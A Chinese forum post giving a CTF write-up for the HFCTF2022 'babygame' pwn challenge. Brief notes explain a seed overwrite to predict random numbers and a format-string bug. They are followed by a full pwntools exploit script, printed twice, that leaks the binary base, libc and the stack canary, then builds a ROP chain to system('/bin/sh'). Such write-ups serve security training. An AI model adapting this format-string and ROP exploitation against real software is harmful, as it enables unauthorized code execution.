首页
社区
课程
招聘
[原创]【HFCTF2022】babygame
发表于: 2022-4-28 18:28 13612

[原创]【HFCTF2022】babygame

2022-4-28 18:28
13612

(1)调用函数和被调用函数的canary的值是一样的

(2)fmt需要事先在栈上设置修改位置

img

img

从栈帧中可以看出srand的seed———v5是可以被我们覆盖而修改的,那么我们可以外接linux(windows和linux对同样的seed跑出的随机不太一样)上跑好的随机数达到绕过随机数检测的目的

不仅如此,栈上还放了一些残留的进程,我们可以利用这个来leak进程的基地址

img

简单的绕过随机数,攻防世界的入门题了属于是

img

明显的字符串格式化漏洞,可以用它泄露libc,canary和fmt修改栈上内容(返回地址啥的)

通过金手指泄露libc和canary,同时fmt修改返回地址为main函数,然后main函数里面填补canary的同时栈溢出进行rop

 
 
 
 
 
#encoding: utf-8 2
#!/usr/bin/python
import sys
from pwn import *
from LibcSearcher import *
from pwnlib.util.iters import mbruteforce
from hashlib import sha256
import base64
context.log_level='debug'
context.arch = 'amd64'
context.os = 'linux'
def proof_of_work(sh):
    sh.recvuntil(" == ")
    cipher = sh.recvline().strip().decode("utf8")
    proof = mbruteforce(lambda x: sha256((x).encode()).hexdigest() ==  cipher, string.ascii_letters + string.digits, length=4, method='fixed')
    sh.sendlineafter("input your ????>", proof)
 
def z():
    gdb.attach(r)
 
r=process('./babygame')
libc=ELF('./libc-2.31.so')
 
##leak_proc_base
pd=0x108*'a'+0x30*'a'+'nameless'+'nameless'
r.sendafter("Please input your name:",pd)
r.recvuntil('namelessnameless')
elfbase=u64(r.recv(6).ljust(8,'\x00'))-0x1465
log.info('elfbase:'+hex(elfbase))
 
##set
read_addr=elfbase+0x14B6
 
##dao_ru_random
f=open('test','r')
a=['0']*100
for i in range(0,100):
    line=f.readline()
    line=line[:-1]
    a[i]=str(line)
f.close()
count=1
for i in range(0,100):
    r.recvuntil('round '+str(count))
    if a[i] == '1':
       r.sendline('2')
    if a[i] == '2':
       r.sendline('0')
    if a[i] == '0':
       r.sendline('1')
    count=count+1
 
##golden_finger
pd='%27$p%35$p'
pd+='%{}c%11$hn'.format((read_addr & 0xffff)-32)
pd=pd.ljust(0x28,'\x00')+'\x68'
r.sendafter("Good luck to you.\n",pd)
libcbase=int(r.recv(14),16)-(libc.sym['atoi']+20)
canary=int(r.recv(18),16)
log.success('libcbase:'+hex(libcbase))
log.success('canary:'+hex(canary))
log.success('read_addr:'+hex(read_addr))
 
##set
system=libcbase+libc.sym['system']
pdt=libcbase+0x23b72 ##pop_rdi_ret
ret=libcbase+0x22679
bin_sh=libcbase+libc.search('/bin/sh\x00').next()
rop=p64(pdt)+p64(bin_sh)+p64(ret)+p64(system)
pd=(0x120-0x18)*'a'+p64(canary)+0x18*'a'+rop
##z()
r.sendafter("Please input your name:",pd)
r.sendlineafter('round',str(1))
r.interactive()
#encoding: utf-8 2
#!/usr/bin/python
import sys
from pwn import *
from LibcSearcher import *
from pwnlib.util.iters import mbruteforce
from hashlib import sha256
import base64
context.log_level='debug'
context.arch = 'amd64'
context.os = 'linux'
def proof_of_work(sh):
    sh.recvuntil(" == ")
    cipher = sh.recvline().strip().decode("utf8")
    proof = mbruteforce(lambda x: sha256((x).encode()).hexdigest() ==  cipher, string.ascii_letters + string.digits, length=4, method='fixed')
    sh.sendlineafter("input your ????>", proof)
 
def z():
    gdb.attach(r)
 
r=process('./babygame')
libc=ELF('./libc-2.31.so')
 
##leak_proc_base
pd=0x108*'a'+0x30*'a'+'nameless'+'nameless'
r.sendafter("Please input your name:",pd)
r.recvuntil('namelessnameless')
elfbase=u64(r.recv(6).ljust(8,'\x00'))-0x1465
log.info('elfbase:'+hex(elfbase))

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

上传的附件:
收藏
免费 2
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//